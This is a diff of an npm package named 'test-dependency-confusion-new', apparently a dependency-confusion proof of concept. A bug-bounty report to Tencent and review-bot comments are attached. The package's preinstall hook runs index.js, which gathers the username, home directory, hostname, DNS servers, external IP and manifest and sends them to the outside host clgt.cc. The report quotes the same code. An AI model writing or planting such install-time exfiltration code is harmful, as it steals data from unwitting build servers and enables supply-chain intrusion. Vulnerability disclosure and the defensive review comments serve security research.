test-dependency-confusion-new 1.0.3



Files changed (3) hide show
  1. package/index.js +86 -0
  2. package/package.json +12 -0
  3. package/rce +78 -0
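--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,86 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+let have_child_process = true
+try {
+const { exec } = require('child_process')
+} catch(e) {
+have_child_process = false
+}
+
+const sleep = (milliseconds) => {
+return new Promise(resolve => setTimeout(resolve, milliseconds))
+}
+
+function requestPromise(endpoint) {
+var body = ''
+
+return new Promise(function(resolve, reject){
+https.get((endpoint), res => {
+res.setEncoding('utf8');
+res.on("data", data => {
+body += data;
+});
+res.on("end", () => {
+resolve(body)
+});
+res.on("error", (e) => {
+reject(e);
+});
+});
+});
+
+}
+
+async function main() {
+
+const url = 'https://ifconfig.me'
+const ip = await requestPromise(url)
+
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+ip: ip,
+child_process: have_child_process ? 1 : 0,
+});
+
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/dependency-conf-npm.php",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();
+} main()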
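Review bot: The `https.get` call inside `requestPromise` never attaches an `error` listener to the request it returns, so a DNS or TLS failure reaching ifconfig.me surfaces as an unhandled `'error'` event that aborts the preinstall with an uncaught exception instead of rejecting the promise — the `res.on("error")` handler only covers the response stream; chain `.on('error', reject)` onto the `https.get(...)` call. `"Content-Length": postData.length` counts UTF-16 code units rather than bytes, so any non-ASCII character in the hostname, home directory or `__dirname` yields a truncated POST; use `"Content-Length": Buffer.byteLength(postData)`. Independently of those bugs, the script exfiltrates the username, home directory, resolver list, external IP and the full manifest to a hard-coded third-party host (`clgt.cc`) at install time; a dependency-confusion proof should send only what is needed to attribute the callback (package name and hostname, say), and the `sleep` helper and the destructured `exec` are never used.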
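--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "test-dependency-confusion-new",
+"version": "1.0.3",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "",
+"license": "ISC"
+}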
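Review bot: `"preinstall": "node index.js"` makes `index.js` run automatically whenever this package is installed with lifecycle scripts enabled, before anything from it is ever imported — that hook is the whole install-time execution vector the bundled `rce` note describes. A consumer or mirror that syncs untrusted registries should install with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) rather than only inspecting `preinstall`, since npm also runs `install` and `postinstall` entries from the same `scripts` block. The manifest ships empty `description` and `author` fields and no `repository`, so there is nothing a mirror could use to check provenance before executing it.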
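--- a/package/rce
+++ b/package/rce
@@ -0,0 +1,78 @@
+Dear Team,
+
+I have found a RCE vulnerability on your mirrors.tencent.com server via dependency confusion
+
+1. Detailed Description :
+- The vulnerability is very simple, your mirrors.tencent.com server is monitoring all packages on npmjs.com. When you found any new package, you do sync new package to your server and do something including install new package
+- So If I create a new package for example this case, name: test-dependency-confusion, here is package.json
+```
+> cat package.json
+{
+"name": "test-dependency-confusion",
+"version": "1.0.2",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "",
+"license": "ISC"
+}
+```
+You can see in scripts section, preinstall: node index.js
+I have create index.js, do following:
+** collection current server information: user, current working directory, os name, ip address (via call http://ifconfig.me)**
+** Then I send all information to my server https://clgt.cc/**
+Here is source code
+```
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+ip: ip,
+child_process: have_child_process ? 1 : 0,
+});
+
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/dependency-conf-npm.php",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+```
+
+- I do something and push to npmjs repository, I get the link publish https://www.npmjs.com/package/test-dependency-confusion
+- wait for some minutes, I got signal request to my server with the information, there are some servers from you
+
+2. Proof :
+Please do check my attachment images
+
+3. Impact
+An attacker can do remote code execution on your server
+
+3. How to fix :
+- I think after download/sync package, you should check preinstall script is existed or not. If it exists, do check or remove it
+
+Thanks and Best Regards,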